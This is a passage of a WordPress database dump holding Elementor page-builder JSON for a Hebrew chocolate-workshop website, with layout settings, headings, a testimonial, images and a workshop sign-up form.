,\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"50\"},\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":28},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"bold\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(106,36,'_elementor_version','0.4'),(109,37,'_wp_page_template','elementor_canvas'),(110,37,'_elementor_edit_mode','builder'),(111,37,'_elementor_template_type','post'),(112,37,'_elementor_data','[{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Damion\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 